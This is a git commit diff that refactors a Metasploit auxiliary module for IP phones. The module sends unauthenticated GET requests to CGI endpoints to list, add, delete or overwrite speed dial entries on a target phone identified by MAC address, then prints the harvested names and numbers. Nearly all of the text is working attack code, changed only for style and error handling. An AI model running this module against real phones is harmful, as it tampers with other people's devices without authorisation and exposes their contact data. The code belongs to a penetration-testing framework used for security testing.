Do first code cleanup
jvazquez-r7
parent
000d7dd1eb
commit
cf9d7d583e
|
|
@ -48,100 +48,133 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
uri = normalize_uri(target_uri.to_s)
|
mac = Rex::Text.uri_encode(datastore['MAC'])
|
||||||
mac = Rex::Text.uri_encode(datastore["MAC"])
|
name = Rex::Text.uri_encode(datastore['NAME'])
|
||||||
name = Rex::Text.uri_encode(datastore["NAME"])
|
position = Rex::Text.uri_encode(datastore['POSITION'])
|
||||||
position = Rex::Text.uri_encode(datastore["POSITION"])
|
telno = Rex::Text.uri_encode(datastore['TELNO'])
|
||||||
telno = Rex::Text.uri_encode(datastore["TELNO"])
|
|
||||||
|
|
||||||
|
|
||||||
case action.name.upcase
|
case action.name.upcase
|
||||||
when 'MODIFY'
|
when 'MODIFY'
|
||||||
print_status("Deleting Speed Dial of the IP phone")
|
print_status("#{peer} - Deleting Speed Dial of the IP phone")
|
||||||
url=uri+"/phonespeeddialdelete.cgi?entry=#{position}&device=SEP#{mac}"
|
|
||||||
vprint_status("URL: "+url)
|
vars_get = {
|
||||||
status,res=send_rcv(url)
|
'entry' => "#{position}",
|
||||||
if status != Exploit::CheckCode::Safe and res.body =~ /Deleted/
|
'device' => "SEP#{mac}"
|
||||||
print_good("Speed Dial #{position} is deleted successfully")
|
}
|
||||||
print_status("Adding Speed Dial to the IP phone")
|
|
||||||
url=uri+"/phonespeedialadd.cgi?name=#{name}&telno=#{telno}&device=SEP#{mac}&entry=#{position}&mac=#{mac}"
|
status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)
|
||||||
vprint_status("URL: "+url)
|
|
||||||
status,res=send_rcv(url)
|
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
|
||||||
if status != Exploit::CheckCode::Safe and res.body =~ /Added/
|
print_good("#{peer} - Speed Dial #{position} is deleted successfully")
|
||||||
print_good("Speed Dial #{position} is added successfully")
|
print_status("#{peer} - Adding Speed Dial to the IP phone")
|
||||||
elsif res.body =~ /exist/
|
|
||||||
print_error("Speed Dial is exist, change the position or choose modify!")
|
vars_get = {
|
||||||
|
'name' => "#{name}",
|
||||||
|
'telno' => "#{telno}",
|
||||||
|
'device' => "SEP#{mac}",
|
||||||
|
'entry' => "#{position}",
|
||||||
|
'mac' => "#{mac}"
|
||||||
|
}
|
||||||
|
|
||||||
|
status, res = send_rcv('phonespeedialadd.cgi', vars_get)
|
||||||
|
|
||||||
|
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
|
||||||
|
print_good("#{peer} - Speed Dial #{position} is added successfully")
|
||||||
|
elsif res && res.body =~ /exist/
|
||||||
|
print_error("#{peer} - Speed Dial is exist, change the position or choose modify!")
|
||||||
else
|
else
|
||||||
print_error("Speed Dial couldn't add!")
|
print_error("#{peer} - Speed Dial couldn't add!")
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
print_error("Speed Dial is not found!")
|
print_error("#{peer} - Speed Dial is not found!")
|
||||||
end
|
end
|
||||||
when 'DELETE'
|
when 'DELETE'
|
||||||
print_status("Deleting Speed Dial of the IP phone")
|
print_status("#{peer} - Deleting Speed Dial of the IP phone")
|
||||||
url=uri+"/phonespeeddialdelete.cgi?entry=#{position}&device=SEP#{mac}"
|
|
||||||
vprint_status("URL: "+url)
|
vars_get = {
|
||||||
status,res=send_rcv(url)
|
'entry' => "#{position}",
|
||||||
if status != Exploit::CheckCode::Safe and res.body =~ /Deleted/
|
'device' => "SEP#{mac}"
|
||||||
print_good("Speed Dial #{position} is deleted successfully")
|
}
|
||||||
|
|
||||||
|
status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)
|
||||||
|
|
||||||
|
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
|
||||||
|
print_good("#{peer} - Speed Dial #{position} is deleted successfully")
|
||||||
else
|
else
|
||||||
print_error("Speed Dial is not found!")
|
print_error("#{peer} - Speed Dial is not found!")
|
||||||
end
|
end
|
||||||
|
|
||||||
when 'ADD'
|
when 'ADD'
|
||||||
print_status("Adding Speed Dial to the IP phone")
|
print_status("#{peer} - Adding Speed Dial to the IP phone")
|
||||||
url=uri+"/phonespeedialadd.cgi?name=#{name}&telno=#{telno}&device=SEP#{mac}&entry=#{position}&mac=#{mac}"
|
vars_get = {
|
||||||
vprint_status("URL: "+url)
|
'name' => "#{name}",
|
||||||
status,res=send_rcv(url)
|
'telno' => "#{telno}",
|
||||||
if status != Exploit::CheckCode::Safe and res.body =~ /Added/
|
'device' => "SEP#{mac}",
|
||||||
print_good("Speed Dial #{position} is added successfully")
|
'entry' => "#{position}",
|
||||||
elsif res.body =~ /exist/
|
'mac' => "#{mac}"
|
||||||
print_error("Speed Dial is exist, change the position or choose modify!")
|
}
|
||||||
|
status, res = send_rcv('phonespeedialadd.cgi', vars_get)
|
||||||
|
|
||||||
|
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
|
||||||
|
print_good("#{peer} - Speed Dial #{position} is added successfully")
|
||||||
|
elsif res && res.body && res.body.to_s =~ /exist/
|
||||||
|
print_error("#{peer} - Speed Dial is exist, change the position or choose modify!")
|
||||||
else
|
else
|
||||||
print_error("Speed Dial couldn't add!")
|
print_error("#{peer} - Speed Dial couldn't add!")
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
print_status("Getting Speed Dials of the IP phone")
|
print_status("Getting Speed Dials of the IP phone")
|
||||||
url=uri+"/speeddials.cgi?device=SEP#{mac}"
|
vars_get = {
|
||||||
vprint_status("URL: "+url)
|
'device' => "SEP#{mac}"
|
||||||
|
}
|
||||||
|
|
||||||
status,res=send_rcv(url)
|
status, res = send_rcv('speeddials.cgi', vars_get)
|
||||||
parse(res) if status != Exploit::CheckCode::Safe
|
parse(res) unless status == Exploit::CheckCode::Safe
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def send_rcv(uri)
|
def send_rcv(uri, vars_get)
|
||||||
uri=normalize_uri(uri.to_s)
|
uri = normalize_uri(target_uri.to_s, uri.to_s)
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
{
|
{
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
|
'vars_get' => vars_get
|
||||||
})
|
})
|
||||||
|
|
||||||
if res and res.code == 200 and res.body =~ /Speed [D|d]ial/
|
if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [D|d]ial/
|
||||||
return Exploit::CheckCode::Vulnerable,res
|
return Exploit::CheckCode::Vulnerable, res
|
||||||
else
|
else
|
||||||
print_error("Target appears not vulnerable!")
|
print_error("#{peer} - Target appears not vulnerable!")
|
||||||
return Exploit::CheckCode::Safe,res
|
return Exploit::CheckCode::Safe, res
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def parse(res)
|
def parse(res)
|
||||||
doc = REXML::Document.new(res.body)
|
doc = REXML::Document.new(res.body)
|
||||||
names=[]
|
names = []
|
||||||
phones=[]
|
phones = []
|
||||||
|
|
||||||
list=doc.root.get_elements("DirectoryEntry")
|
list = doc.root.get_elements('DirectoryEntry')
|
||||||
list.each {|lst|
|
list.each do |lst|
|
||||||
xlist=lst.get_elements("Name")
|
xlist = lst.get_elements('Name')
|
||||||
xlist.each {|l| names << "#{l[0]}"}
|
xlist.each {|l| names << "#{l[0]}"}
|
||||||
xlist=lst.get_elements("Telephone")
|
xlist = lst.get_elements('Telephone')
|
||||||
xlist.each {|l| phones << "#{l[0]}" }
|
xlist.each {|l| phones << "#{l[0]}" }
|
||||||
}
|
end
|
||||||
|
|
||||||
if names.size > 0
|
if names.size > 0
|
||||||
names.size.times{|i| print_good("Position: "+names[i].split(":")[0]+"\tName: "+names[i].split(":")[1]+"\t"+"Telephone: "+phones[i])}
|
names.size.times do |i|
|
||||||
|
info = ''
|
||||||
|
info << "Position: #{names[i].split(":")[0]}, "
|
||||||
|
info << "Name: #{names[i].split(":")[1]}, "
|
||||||
|
info << "Telephone: #{phones[i]}"
|
||||||
|
|
||||||
|
print_good("#{peer} - #{info}")
|
||||||
|
end
|
||||||
else
|
else
|
||||||
print_status("No Speed Dial detected")
|
print_status("#{peer} - No Speed Dial detected")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue